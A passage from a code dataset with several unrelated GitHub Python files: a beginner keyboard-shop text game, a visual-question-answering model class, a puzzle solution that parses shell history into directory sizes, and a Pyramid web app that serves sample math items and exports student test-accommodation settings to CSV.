they sound!') % (self.layout, self.pcb, self.plate, self.switches)\r\n\r\n#Area of random generators\r\n\r\ndef layout():\r\n layout_list = [60, 65, 75, \"TKL\", \"Full-sized\", \"board\", \r\n \" Alice\"]\r\n\r\n return (random.choice(layout_list))\r\n\r\n\r\n#random word generator\r\ndef random_words():\r\n word_list = [\"Love\", \"Queen\", \"King\", \"Ace\", \"Joker\", \"Mental\", \"Atlas\", \"Mr. Suit\", \"Cyber\", \"Oni\", \"Hanja\", \"Wind\", \"Honey\", \"Bakeneko\", \"Wolf\", \"Galaxy\", \"Bubble\", \"Glorious\", \"Cafe\", \"Star\", \"Adept\", \"Nightmare\", \"Shadow\", \"Angel\", \"Unikorn\", \"Jane\", \"Dragon\", \"Play\", \"Focus\", \"Viking\", \"Archon\", \"Satisfaction\", \"Blade\", \"Python\", \"Comet\", \"Mind\", \"Destruction\", \"Glacier\", \"Inferno\", \"Nature\", \"Blank\"]\r\n generate_words = word_list.copy()\r\n random.shuffle(generate_words)\r\n return generate_words[0]\r\n\r\nbuild_keyboard = Keyboard(\"layout\", \"PCB\", \"plate\", \"switches\")\r\nstart = input(\"Welcome to the world of keyboards. Would you like an introduction?(Y/N)\")\r\nwhile start.upper() != 'Y' and start.upper() != 'N':\r\n start = input(\"Error: unacceptable input, try again. (Y/N)\")\r\n\r\nif start.upper() == 'Y':\r\n print(\"Great! Let me get your started with the important areas of a keyboard\")\r\n time.sleep(1)\r\n print (build_keyboard)\r\n\r\nif start.upper() == 'N':\r\n print(\"Well you must be a recurring user here!. welcome back! 
Lets get you to the main lobby!\")\r\n time.sleep(1) \r\n \r\n#Decide what areas to go into\r\n\r\nkeyboard_Rooms = ['Shop', 'Live Events', 'Inventory', 'News', 'Exit']\r\nkeyboard_inventory = ['Basic keyboard (Prebuilt, Membrane)']\r\nunbuilt_keyboard_inventory = []\r\nswitch_inventory = []\r\nprint(\"\\nSo... we are in the main lobby. Right now this code is in development. so we have \\\"Shop\\\" \\\"Live Events\\\" \\\"Inventory\\\" \\\"News\\\", \\\"Build Keyboard\\\" and if you decide you are done. Type in \\\"Exit\\\"\")\r\nchoose_room = input(\"\\nHere we are! Now press enter to continue!\")\r\nwhile choose_room.title() != 'Exit':\r\n choose_room = input(\"\\nChoose a room!\")\r\n if choose_room.title() != 'Shop' and choose_room.title() != 'News' and choose_room.title() != 'Inventory' and choose_room.title() != 'Live Events' and choose_room.title() != 'Exit' and choose_room.title() != 'Build Keyboard':\r\n continue\r\n if choose_room.title() == 'Exit':\r\n print(\"Well then... Goodbye! See you around~\")\r\n break\r\n\r\n if choose_room.title() == 'News':\r\n pass\r\n continue\r\n\r\n if choose_room.title() == 'Build Keyboard':\r\n if unbuilt_keyboard_inventory == [] or switch_inventory == []:\r\n print(\"You don't have the parts to build a keyboard\")\r\n continue\r\n\r\n if choose_room.title() == 'Live Events':\r\n print('There are no live events at the moment. Sorry!')\r\n continue\r\n\r\n if choose_room.title() == 'Inventory':\r\n count = 0\r\n print(\"Keyboard Inventory\\n\" + str(keyboard_inventory))\r\n\r\n print(\"\\nUnbuilt Keyboards\\n\" + str(unbuilt_keyboard_inventory))\r\n\r\n print(\"\\n Switch Inventory\\n\" + str(switch_inventory))\r\n count += 1\r\n if count == 1:\r\n continue\r\n\r\n if choose_room.title() == 'Shop':\r\n time.sleep(1)\r\n print(\"\\nWelcome to the shop\\n\")\r\n choose_shop_room = input(\"Choose an area to shop! (Keyboard Kit, Switches, Stabilizers, Keycaps, or Return)\")\r\n\r\n while choose_shop_room.title() != 'Keyboard Kit' and choose_shop_room.title() != 'Switches' and choose_shop_room.title() != 'Stabilizers' and choose_shop_room.title() != 'Keycaps' and choose_shop_room.title() != 'Return':\r\n choose_shop_room = input(\"Choose an area to shop! (Keyboard Kit, Switches, Stabilizers, Keycaps or Return.)\")\r\n\r\n if choose_shop_room.title() == 'Keyboard Kit':\r\n keyboards_available = random.randint(0, 5)\r\n\r\n for i in range(0, keyboards_available):\r\n keyboard_name = random_words()\r\n keyboard_layout = layout()\r\n keyboard_name_list.append(keyboard_name + str(keyboard_layout))\r\n \r\n if keyboards_available == 0:\r\n print(\"\\nWe have no keyboards available. Please come back later.\")\r\n continue\r\n \r\n elif keyboards_available == 1:\r\n print('\\n We have only ' + str(keyboards_available) + ' keyboard available today. \\n')\r\n for keyboard in keyboard_name_list:\r\n print(keyboard)\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? 
(Y/N)\" % (keyboard))\r\n if keyboard in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n \r\n if keyboard not in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n \r\n if buy_keyboard.upper() == 'Y':\r\n count = keyboards_available\r\n for bought_keyboard in buy_keyboard:\r\n unbuilt_keyboard_inventory.append(keyboard)\r\n\r\n if buy_keyboard.upper() == 'N':\r\n count = keyboards_available\r\n print(\"\\n\")\r\n count -= 1\r\n \r\n if count == 0:\r\n for keyboard in keyboard_name_list:\r\n if keyboard_name_list not in unbuilt_keyboard_inventory:\r\n keyboard_name_list.remove(keyboard)\r\n continue\r\n \r\n \r\n if keyboards_available > 1:\r\n count = keyboards_available\r\n print(\"\\nWe have \" + str(keyboards_available) + \" keyboards available today. \\n\")\r\n time.sleep(1)\r\n for keyboard in keyboard_name_list:\r\n print(keyboard)\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? (Y/N)\\n\" % (keyboard))\r\n \r\n while buy_keyboard.upper() != 'Y' and buy_keyboard.upper() != 'N':\r\n buy_keyboard = input(\"\\nWould you like to buy the %s? (Y/N)\\n\" % (keyboard))\r\n \r\n if buy_keyboard.upper() == 'Y':\r\n for bought_keyboard in buy_keyboard:\r\n unbuilt_keyboard_inventory.append(keyboard)\r\n print(\"\\n\")\r\n count -= 1\r\n \r\n if buy_keyboard.upper() == 'N':\r\n print(\"\\n\")\r\n count -= 1\r\n\r\n if count is 0:\r\n rejected_keyboards = []\r\n accepted_keyboards = []\r\n \r\n for keyboards in keyboard_name_list:\r\n if keyboards in unbuilt_keyboard_inventory:\r\n accepted_keyboards.append(keyboards)\r\n \r\n for keyboards in accepted_keyboards:\r\n if keyboards in keyboard_name_list:\r\n keyboard_name_list.remove(keyboards)\r\n \r\n for keyboards in keyboard_name_list:\r\n if keyboards not in unbuilt_keyboard_inventory:\r\n rejected_keyboards.append(keyboards)\r\n \r\n for keyboards in rejected_keyboards:\r\n if keyboards in keyboard_name_list:\r\n keyboard_name_list.remove(keyboards)\r\n\r\n if choose_shop_room.title() == 'Switches':\r\n time.sleep(1)\r\n print('\\nWelcome to the switch shop! we have several types of switches')\r\n choose_switch_type = input('Choose What switch type you want to buy. [Linears, Tactiles, Silents]')\r\n\r\n while choose_switch_type.title() != 'Linears' and choose_switch_type.title() != 'Tactiles' and choose_switch_type.title() != 'Silents':\r\n choose_switch_type = input(\"Choose a switch type from the list...['Linears', 'Tactiles', 'Silents']\")\r\n if choose_switch_type == 'Clicky':\r\n print(\"Do not ever speak of those ungodly switches again!\")\r\n continue\r\n \r\n if choose_switch_type.title() == 'Linears':\r\n print(\"\\nLinear switches that we have available are: \\n\")\r\n for linearSwitches in switches['Linear']: \r\n print(linearSwitches)\r\n \r\n add_switches = input(\"Pick a switch from the list.\")\r\n if add_switches.title() not in switches['Linear']:\r\n add_switches = input(\"Pick a switch from the list.\")\r\n\r\n if add_switches.title() == 'Cherry Reds' or add_switches.title() == 'Banana Splits' or add_switches.title() == 'Tangerines' or add_switches.title() == 'Alpacas':\r\n switches_amount = int(input(\"How many \" + str(add_switches) + \" would you like? 
(50, 70, 90, 110)\"))\r\n while switches_amount != 50 and switches_amount != 70 and switches_amount != 90 and switches_amount != 110:\r\n switches_amount = int(input(\"How many switches would you like?\"))\r\n\r\n if switches_amount == 50 or switches_amount == 70 or switches_amount == 90 or switches_amount == 110:\r\n switch_inventory.append(add_switches.title() + ', x' + str(switches_amount))\r\n if add_switches.title() == 'Cancel' or add_switches.title() == 'Return':\r\n pass\r\n continue\r\n\r\n \r\n if choose_shop_room.title() == 'Return':\r\n pass\r\n continue\r\n ","repo_name":"NexnaNet/Beginner-Code","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":10215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40182772815","text":"\nimport torch\nimport numpy as np\nfrom pathlib import Path\n\nfrom omegaconf import OmegaConf\nfrom app.mmf.mmf.models.interfaces.qlarifais import QlarifaisInterface\n\nfrom app.mmf.mmf.models.base_model import BaseModel\nfrom app.mmf.mmf.common.registry import registry\nfrom app.mmf.mmf.utils.checkpoint import load_pretrained_model\nfrom app.mmf.mmf.utils.text import *\n\nfrom app.mmf.mmf.utils.build import (\n build_image_encoder,\n build_text_encoder,\n build_graph_encoder,\n build_fusion_module,\n build_classifier,\n build_attention_module\n )\n\n# mmf_run config='configs/experiments/baseline/mul.yaml' model=qlarifais dataset=okvqa run_type=train_val\n\n@registry.register_model(\"qlarifais\")\nclass Qlarifais(BaseModel):\n\n def __init__(self, config):\n super().__init__(config)\n self.build()\n\n @classmethod\n def from_pretrained(cls, model_name, *args, **kwargs):\n model = super().from_pretrained(model_name, *args, **kwargs)\n config = load_pretrained_model(model_name)[\"full_config\"]\n OmegaConf.set_struct(config, True)\n return QlarifaisInterface(model, config)\n\n @classmethod\n def config_path(cls):\n # Relative to user dir root\n return \"configs/models/qlarifais/defaults.yaml\"\n\n def build(self):\n\n # building general modules\n self.vision_module = build_image_encoder(self.config.image_encoder)\n self.language_module = build_text_encoder(self.config.text_encoder)\n self.fusion_module = build_fusion_module(self.config.fusion)\n self.classifier = build_classifier(self.config.classifier)\n\n # external knowledge\n self.graph_encoder = build_graph_encoder(self.config.graph_encoder)\n\n # attention\n if self.config.attention.use:\n # initiating attention module\n self.attention_module = build_attention_module(self.config.attention.params)\n\n def forward(self, sample_list):\n\n # --- QUESTION EMBEDDINGS ---\n # text input features will be in \"input_ids\" key\n question = sample_list[\"input_ids\"]\n # get the text and image features from the encoders\n question_features = self.language_module(question)\n # IMAGE FEATURES\n image = sample_list[\"image\"]\n image_features = self.vision_module(image) # [batch_size, i_dim, sqrt(max_features), sqrt(max_features)] # TODO: ?\n\n # --- GRAPH EMBEDDINGS ---\n if self.config.graph_encoder.use:\n graph_features = self.graph_encoder(sample_list['tokens']) # [batch_size, g_dim]\n\n\n # --- ATTENTION ---\n if self.config.attention.use:\n # getting correct input shape\n image_features = image_features.flatten(2,3).permute(0, 2, 1) # [batch_size, num_features, i_dim]\n # extracting attention based on defined attention mechanism\n if self.config.attention.type == 'question_guided':\n attention = 
self.attention_module(image_features, question_features)\n if self.config.attention.type == 'graph_guided':\n attention = self.attention_module(image_features, graph_features)\n if self.config.attention.type == 'question_graph_guided':\n attention = self.attention_module(image_features, question_features, graph_features)\n # [batch_size, num_features, 1]\n # weighted average of image features\n image_features = (attention * image_features).sum(1) # [batch_size, i_dim]\n # if not using attention\n else:\n if self.config.image_encoder.resize == 'average_pooling':\n # average pool K features of size 2048\n image_features = torch.mean(image_features, dim = (2,3)) # [batch_size, i_dim]\n\n\n # --- FUSION ---\n # type of fusion based on inputs\n if self.config.graph_encoder.use:\n fused_features = self.fusion_module(image_features, question_features, graph_features)\n else:\n fused_features = self.fusion_module(image_features, question_features)\n # [batch_size, answer_vocab_dim]\n\n # --- CLASSIFICATION ---\n # embeddings\n logits = self.classifier(fused_features)\n # average embedded annotator answer for type contrastive loss\n avg_embedded_answers = self.graph_encoder(sample_list['answers'])\n output = {\"output_type\": self.config.classifier.output_type, \"avg_embedded_answers\": avg_embedded_answers,\n \"scores\": logits}\n return output\n","repo_name":"PhillipHoejbjerg/WebVQA","sub_path":"app/mmf/mmf/models/qlarifais.py","file_name":"qlarifais.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19746724460","text":"import re\n\nf = open(\"data.txt\", \"r\")\nbashhistory=f.read().splitlines()\n# bashhistory=['$ cd /',\n# '$ ls',\n# 'dir a',\n# '14848514 b.txt',\n# '8504156 c.dat',\n# 'dir d',\n# '$ cd a',\n# '$ ls',\n# 'dir e',\n# '29116 f',\n# '2557 g',\n# '62596 h.lst',\n# '$ cd e',\n# '$ ls',\n# '584 i',\n# '$ cd ..',\n# '$ cd ..',\n# '$ cd d',\n# '$ ls',\n# '4060174 j',\n# '8033020 d.log',\n# '5626152 d.ext',\n# '7214296 k']\n\nclass LsCmd:\n pass\n\ndef get_cd_target(line):\n m_cd = re.search('\\$ cd (.*)$', line)\n if m_cd is not None:\n return(m_cd.group(1))\n elif (line == '$ ls'):\n return None #LsCmd()\n else:\n warning(\"oops\")\n\n# I could just have a vector of pointers, but this is what I started with...\ndef get_pointer_from_dirstack(dirstack, filemap):\n pointer = filemap\n for dir in dirstack:\n pointer = pointer[dir]\n return pointer\n\ndef update_all_dirs_size(dir_stack,filesize):\n for pointer in dir_stack:\n if \"__SIZE__\" in pointer.keys():\n pointer[\"__SIZE__\"]+=filesize\n else:\n pointer[\"__SIZE__\"]=filesize\n\ndef shell2dict(shell_hist):\n dir_stack=[]\n filemap={\"/\":{}}\n pointer=filemap\n\n for line in shell_hist:\n # print(\"###\",\"'\"+line+\"'\")\n # interpret cd commands\n if line[0] == \"$\":\n cd_target=get_cd_target(line)\n if(cd_target is not None):\n if(cd_target == \"..\"):\n #dir_stack.pop()\n #deprecated# pointer=get_pointer_from_dirstack(dir_stack, filemap)\n dir_stack.pop()\n pointer=dir_stack[-1]\n else:\n #deprecated# dir_stack.append(cd_target)\n pointer=pointer[cd_target]\n dir_stack.append(pointer)\n # create directories\n elif line.startswith(\"dir\"):\n dirname_match = re.search('dir (.*)$', line)\n dirname=dirname_match.group(1)\n if dirname not in pointer.keys():\n pointer[dirname]={}\n # create files\n else:\n m_size = re.search('([0-9]+) (.*)$', line)\n if(m_size is not None):\n filesize=int(m_size.group(1))\n 
filename=m_size.group(2)\n # print(\"file\",filename,\"=\",filesize)\n pointer[filename]=filesize\n else:\n warning(\"oops\")\n update_all_dirs_size(dir_stack,filesize)\n \n #print(\"stack depth\",len(dir_stack))\n #print(pointer)\n return filemap\n\nfilemap=shell2dict(bashhistory)\nprint(filemap)\n\ndef get_part1_heuristic(rest_of_disk):\n retSum=0\n for name in rest_of_disk.keys():\n pointer=rest_of_disk[name]\n if isinstance(pointer,dict):\n retSum+=get_part1_heuristic(pointer)\n elif name == \"__SIZE__\":\n if pointer < 100000:\n retSum+=pointer\n return retSum\n\nprint(\"Part 1:\",get_part1_heuristic(filemap))\nmax_used_disk=40000000\ncur_used_disk=filemap[\"/\"][\"__SIZE__\"]\ndiff_to_delete=cur_used_disk-max_used_disk\nprint(\"Used disk:\",cur_used_disk)\nprint(\"Need to delete:\",diff_to_delete)\n\ndef find_best_match_dir(rest_of_disk,needed_space,stack):\n this_dir_size=rest_of_disk[\"__SIZE__\"]\n\n if (this_dir_sizeWhich model of the garden represents four rectangular sections for planting vegetables according to the class plan?
Each square on the model represents 1 square foot.
',\n 'answers': [\n {\n 'name': \"Option A\",\n 'value': '',\n 'order': 1\n },\n {\n 'name': \"Option B\",\n 'value': '',\n 'order': 2\n },\n {\n 'name': \"Option C\",\n 'value': '',\n 'order': 3\n },\n {\n 'name': \"Option D\",\n 'value': '
',\n 'order': 4\n },\n\n ]\n }\n data['2'] = {\n 'js_files': \"/ari/js/core.js\",\n 'send_data': \"/api/score\",\n 'identifier': 1448,\n 'div': 'container',\n 'item_type': \"multiple_choice\",\n 'item_subject': \"MATH\",\n 'item_version': 8,\n 'ari_version': 1,\n 'order': 2,\n 'description': \"Cloned from ITS 766\",\n 'concept': \"What Knowledge Do Students Need to Understand This Concept?\",\n 'prompt': '
Coffee costs $2 per pound at a coffee shop. Which graph represents this situation?
',\n 'answers': [\n {\n 'name': \"Option A\",\n 'value': '',\n 'order': 1\n },\n {\n 'name': \"Option B\",\n 'value': '',\n 'order': 2\n },\n {\n 'name': \"Option C\",\n 'value': '',\n 'order': 3\n },\n {\n 'name': \"Option D\",\n 'value': '
',\n 'order': 4\n } \n ]\n }\n\n response = Response(content_type='text/json')\n response.text = json.dumps(data[current_order])\n return response\n\n\ndef itemSave(context, request):\n response = Response(content_type='text/json')\n response.text = json.dumps({'status': 1})\n return response\n\ndef convertToCSVLegacy(context, request):\n\n students = json.loads(request.POST['json_data'])\n\n data = {\n 'Student Last Name': [],\n 'Student First Name': [],\n 'SSID (consistent with TIDE)': [],\n 'Grade': [],\n 'Educator(s) completing ISAAP': [],\n 'Teacher of Record': [],\n 'School ID': [],\n 'School Name': [],\n 'Abacus': [],\n '*Alternate Response Options (including any external devices/assistive technologies)': [],\n 'American Sign Language for ELA Listening and Math Items': [],\n 'Bilingual Dictionary for ELA Full Writes (ET)': [],\n 'Braille': [],\n 'Calculator': [],\n 'Closed Captioning for ELA Listening Items': [],\n 'Color Contrast (EMBEDDED)': [],\n '*Color Contrast (NON-EMBEDDED)': [],\n 'Color Overlays': [],\n '*Magnification': [],\n 'Masking': [],\n 'Multiplication Table': [],\n 'Noise Buffers': [],\n '*Print on Demand': [],\n '*Read Aloud for ELA Reading Passages Grades 6-8 and 11': [],\n '*Read Aloud for Math and ELA Items': [],\n '*Scribe': [],\n '*Scribe (for ELA non-writing items and Math items)': [],\n 'Separate Setting': [],\n '*Speech-to-text': [],\n '*Stacked Translations for Math': [],\n '*Text-to-speech for ELA Reading Passages Grades 6-8 and 11': [],\n '*Text-to-speech for Math and ELA Items': [],\n 'Translated Text Directions': [],\n 'Translated Test Directions for Math': [],\n '*Translation Glossaries for Math (ET) (EMBEDDED)': [],\n 'Translation Glossaries for Math (ET) (NON-EMBEDDED)': [],\n }\n\n for el in students:\n data['Student Last Name'].append(el['lastname'])\n data['Student First Name'].append(el['firstname'])\n data['SSID (consistent with TIDE)'].append(el['ssid'])\n data['Grade'].append(el['grade']['selected']['value'])\n data['Educator(s) completing ISAAP'].append('')\n data['Teacher of Record'].append(el['teacher'])\n data['School ID'].append(el['school_id'])\n data['School Name'].append(el['school_name'])\n\n try:\n data['Abacus'].append(el['accommodations']['11']['selected']['value'])\n except (NameError, TypeError):\n data['Abacus'].append('')\n\n try:\n data['*Alternate Response Options (including any external devices/assistive technologies)'].append(el['accommodations']['9']['selected']['value'])\n except (NameError, TypeError):\n data['*Alternate Response Options (including any external devices/assistive technologies)'].append('')\n\n try:\n data['American Sign Language for ELA Listening and Math Items'].append(el['accommodations']['12']['selected']['value'])\n except (NameError, TypeError):\n data['American Sign Language for ELA Listening and Math Items'].append('')\n\n\n try:\n data['Bilingual Dictionary for ELA Full Writes (ET)'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['Bilingual Dictionary for ELA Full Writes (ET)'].append('')\n\n\n try:\n data['Braille'].append(el['accommodations']['10']['selected']['value'])\n except (NameError, TypeError):\n data['Braille'].append('')\n\n\n try:\n data['Calculator'].append(el['accommodations']['5']['selected']['value'])\n except (NameError, TypeError):\n data['Calculator'].append('')\n\n\n try:\n data['Closed Captioning for ELA Listening Items'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['Closed 
Captioning for ELA Listening Items'].append('')\n\n\n try:\n data['Color Contrast (EMBEDDED)'].append(el['designated']['1']['selected']['value'])\n except (NameError, TypeError):\n data['Color Contrast (EMBEDDED)'].append('')\n\n\n try:\n data['*Color Contrast (NON-EMBEDDED)'].append(el['designated']['5']['selected']['value'])\n except (NameError, TypeError):\n data['*Color Contrast (NON-EMBEDDED)'].append('')\n\n try:\n data['Color Overlays'].append(el['designated']['6']['selected']['value'])\n except (NameError, TypeError):\n data['Color Overlays'].append('')\n\n try:\n data['*Magnification'].append(el['designated']['7']['selected']['value'])\n except (NameError, TypeError):\n data['*Magnification'].append('')\n\n try:\n data['Masking'].append(el['designated']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Masking'].append('')\n\n try:\n data['Multiplication Table'].append(el['accommodations']['6']['selected']['value'])\n except (NameError, TypeError):\n data['Multiplication Table'].append('')\n\n try:\n data['Noise Buffers'].append(el['accommodations']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Noise Buffers'].append('')\n\n try:\n data['*Print on Demand'].append(el['accommodations']['1']['selected']['value'])\n except (NameError, TypeError):\n data['*Print on Demand'].append('')\n\n try:\n data['*Read Aloud for ELA Reading Passages Grades 6-8 and 11'].append(el['accommodations']['4']['selected']['value'])\n except (NameError, TypeError):\n data['*Read Aloud for ELA Reading Passages Grades 6-8 and 11'].append('')\n\n try:\n data['*Read Aloud for Math and ELA Items'].append(el['designated']['9']['selected']['value'])\n except (NameError, TypeError):\n data['*Read Aloud for Math and ELA Items'].append('')\n\n try:\n data['*Scribe'].append(el['accommodations']['8']['selected']['value'])\n except (NameError, TypeError):\n data['*Scribe'].append('')\n\n try:\n data['*Scribe (for ELA non-writing items and Math items)'].append(el['designated']['15']['selected']['value'])\n except (NameError, TypeError):\n data['*Scribe (for ELA non-writing items and Math items)'].append('')\n\n try:\n data['Separate Setting'].append(el['designated']['8']['selected']['value'])\n except (NameError, TypeError):\n data['Separate Setting'].append('')\n\n try:\n data['*Speech-to-text'].append(el['accommodations']['7']['selected']['value'])\n except (NameError, TypeError):\n data['*Speech-to-text'].append('')\n\n try:\n data['*Stacked Translations for Math'].append(el['designated']['12']['selected']['value'])\n except (NameError, TypeError):\n data['*Stacked Translations for Math'].append('')\n\n try:\n data['*Text-to-speech for ELA Reading Passages Grades 6-8 and 11'].append(el['accommodations']['3']['selected']['value'])\n except (NameError, TypeError):\n data['*Text-to-speech for ELA Reading Passages Grades 6-8 and 11'].append('')\n\n try:\n data['*Text-to-speech for Math and ELA Items'].append(el['designated']['3']['selected']['value'])\n except (NameError, TypeError):\n data['*Text-to-speech for Math and ELA Items'].append('')\n\n try:\n data['Translated Text Directions'].append(el['designated']['16']['selected']['value'])\n except (NameError, TypeError):\n data['Translated Text Directions'].append('')\n\n try:\n data['Translated Test Directions for Math'].append(el['designated']['10']['selected']['value'])\n except (NameError, TypeError):\n data['Translated Test Directions for Math'].append('')\n\n try:\n data['*Translation Glossaries for Math (ET) 
(EMBEDDED)'].append(el['designated']['11']['selected']['value'])\n except (NameError, TypeError):\n data['*Translation Glossaries for Math (ET) (EMBEDDED)'].append('')\n\n try:\n data['Translation Glossaries for Math (ET) (NON-EMBEDDED)'].append(el['designated']['14']['selected']['value'])\n except (NameError, TypeError):\n data['Translation Glossaries for Math (ET) (NON-EMBEDDED)'].append('')\n\n\n col_order = [\n 'Student Last Name',\n 'Student First Name',\n 'SSID (consistent with TIDE)',\n 'Grade',\n 'Educator(s) completing ISAAP',\n 'Teacher of Record',\n 'School ID',\n 'School Name',\n 'Abacus',\n '*Alternate Response Options (including any external devices/assistive technologies)',\n 'American Sign Language for ELA Listening and Math Items',\n 'Bilingual Dictionary for ELA Full Writes (ET)',\n 'Braille',\n 'Calculator',\n 'Closed Captioning for ELA Listening Items',\n 'Color Contrast (EMBEDDED)',\n '*Color Contrast (NON-EMBEDDED)',\n 'Color Overlays',\n '*Magnification',\n 'Masking',\n 'Multiplication Table',\n 'Noise Buffers',\n '*Print on Demand',\n '*Read Aloud for ELA Reading Passages Grades 6-8 and 11',\n '*Read Aloud for Math and ELA Items',\n '*Scribe',\n '*Scribe (for ELA non-writing items and Math items)',\n 'Separate Setting',\n '*Speech-to-text',\n '*Stacked Translations for Math',\n '*Text-to-speech for ELA Reading Passages Grades 6-8 and 11',\n '*Text-to-speech for Math and ELA Items',\n 'Translated Text Directions',\n 'Translated Test Directions for Math',\n '*Translation Glossaries for Math (ET) (EMBEDDED)',\n 'Translation Glossaries for Math (ET) (NON-EMBEDDED)',\n ]\n\n\n df = pd.DataFrame(data)\n df = df[col_order]\n\n \n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = df.to_csv(index=False).encode(encoding='UTF-8',errors='strict')\n return response\n\n\ndef convertToCSV(context, request):\n\n students = json.loads(request.POST['json_data'])\n\n data = {\n 'StudentIdentifier': [],\n 'StateAbbreviation': [],\n 'Subject': [],\n 'AmericanSignLanguage': [],\n 'ColorContrast': [],\n 'ClosedCaptioning': [],\n 'Language': [],\n 'Masking': [],\n 'PermissiveMode': [],\n 'PrintOnDemand': [],\n 'Zoom': [],\n 'StreamlinedInterface': [],\n 'TexttoSpeech': [],\n 'Translation': [],\n 'NonEmbeddedDesignatedSupports': [],\n 'NonEmbeddedAccommodations': [],\n 'Other': [],\n }\n\n for el in students:\n\n data['StudentIdentifier'].append(el['ssid'])\n data['StateAbbreviation'].append(el['state'])\n data['Subject'].append(el['subject']['selected']['value'])\n\n \n try:\n data['AmericanSignLanguage'].append(el['accommodations']['12']['selected']['value'])\n except (NameError, TypeError):\n data['AmericanSignLanguage'].append('')\n\n try:\n data['ColorContrast'].append(el['designated']['1']['selected']['value'])\n except (NameError, TypeError):\n data['ColorContrast'].append('')\n\n try:\n data['ClosedCaptioning'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['ClosedCaptioning'].append('')\n\n try:\n data['Language'].append(el['language']['selected']['value'])\n except (NameError, TypeError):\n data['Language'].append('')\n\n\n try:\n data['Masking'].append(el['designated']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Masking'].append('')\n\n try:\n data['PermissiveMode'].append(el['permissive_mode']['selected']['value'])\n except (NameError, TypeError):\n 
data['PermissiveMode'].append('')\n\n try:\n data['PrintOnDemand'].append(el['accommodations']['1']['selected']['value'])\n except (NameError, TypeError):\n data['PrintOnDemand'].append('')\n\n try:\n data['Zoom'].append(el['designated']['18']['selected']['value'])\n except (NameError, TypeError):\n data['Zoom'].append('')\n\n try:\n data['StreamlinedInterface'].append(el['designated']['17']['selected']['value'])\n except (NameError, TypeError):\n data['StreamlinedInterface'].append('')\n\n try:\n data['TexttoSpeech'].append(el['designated']['3']['selected']['value'])\n except (NameError, TypeError):\n data['TexttoSpeech'].append('')\n\n try:\n data['Translation'].append(el['designated']['11']['selected']['value'])\n except (NameError, TypeError):\n data['Translation'].append('')\n\n non_des = ''\n # Bilingual Dictionary\n try:\n bil = el['designated']['13']['selected']['value']\n if bil == None:\n raise TypeError\n non_des += bil + \";\"\n except (NameError, TypeError):\n pass\n # Color Contrast\n try:\n color_contrast = el['designated']['5']['selected']['value']\n if color_contrast == None:\n raise TypeError\n non_des += color_contrast + \";\"\n except (NameError, TypeError):\n pass\n # Color Overlay\n try:\n color_overlay = el['designated']['6']['selected']['value']\n if color_overlay == None:\n raise TypeError\n non_des += color_overlay + \";\"\n except (NameError, TypeError):\n pass\n # Magnification\n try:\n mag = el['designated']['7']['selected']['value']\n if mag == None:\n raise TypeError\n non_des += mag + \";\"\n except (NameError, TypeError):\n pass\n # Noise Buffers\n try:\n noise_buff = el['accommodations']['2']['selected']['value']\n if noise_buff == None:\n raise TypeError\n if noise_buff == 'NEA_NoiseBuf':\n noise_buff = 'NEDS_NoiseBuf'\n non_des += noise_buff + \";\"\n except (NameError, TypeError):\n pass\n # Read Aloud\n try:\n read_aloud = el['designated']['9']['selected']['value']\n if read_aloud == None:\n raise TypeError\n non_des += read_aloud + \";\"\n except (NameError, TypeError):\n pass\n # Read Aloud in Spanish\n try:\n non_des += ''\n except (NameError, TypeError):\n pass\n # Separate Setting\n try:\n seperate_setting = el['designated']['8']['selected']['value']\n if seperate_setting == None:\n raise TypeError\n non_des += seperate_setting + \";\"\n except (NameError, TypeError):\n pass\n # Translated Test Directions\n try:\n translated = el['designated']['16']['selected']['value']\n if translated == None:\n raise TypeError\n non_des += translated + \";\"\n except (NameError, TypeError):\n pass\n # Translation (Glossary) \n try:\n translation = el['designated']['14']['selected']['value']\n if translation == None:\n raise TypeError\n if translation == 'English':\n translation = 'TDS_WL_Glossary'\n non_des += translation + \";\"\n except (NameError, TypeError):\n pass\n\n non_des = non_des.replace(';;', ';')\n data['NonEmbeddedDesignatedSupports'].append(non_des)\n\n\n non_accom = ''\n # Abacus\n try:\n abacus = el['accommodations']['11']['selected']['value']\n if abacus == None:\n raise TypeError\n if abacus == 'NEA_Abacus (Math only)':\n abacus = 'NEA_Abacus'\n non_accom += abacus + \";\"\n except (NameError, TypeError):\n pass\n # *Alternate Response Options (including any external devices/assistive technologies)\n try:\n alt = el['accommodations']['9']['selected']['value']\n if alt == None:\n raise TypeError\n non_accom += alt + \";\"\n except (NameError, TypeError):\n pass\n # Calculator\n try:\n calc = el['accommodations']['5']['selected']['value']\n if 
calc == None:\n raise TypeError\n if calc == 'NEA_Calc (Math only)':\n calc = 'NEA_Calc'\n non_accom += calc + \";\"\n except (NameError, TypeError):\n pass\n # Multiplication Table\n try:\n mult = el['accommodations']['6']['selected']['value']\n if mult == None:\n raise TypeError\n if mult == 'NEA_MT (Math only)':\n mult = 'NEA_MT'\n non_accom += mult + \";\"\n except (NameError, TypeError):\n pass\n # Print on Demand\n #try:\n # non_accom += el['accommodations']['1']['selected']['value'] + \";\"\n #except (NameError, TypeError):\n # pass\n # Read Aloud - *Read Aloud for ELA Reading Passages Grades 6-8 and 11\n try:\n read = el['accommodations']['4']['selected']['value']\n if read == None:\n raise TypeError\n if read == 'NEA_RA_Stimuli (ELA only)':\n read = 'NEA_RA_Stimuli'\n non_accom += read + \";\"\n except (NameError, TypeError):\n pass\n # Scribe\n try:\n scribe = el['accommodations']['8']['selected']['value']\n if scribe == None:\n raise TypeError\n if scribe == 'NEA_SC_WritItems (ELA only)':\n scribe = 'NEA_SC_WritItems'\n non_accom += 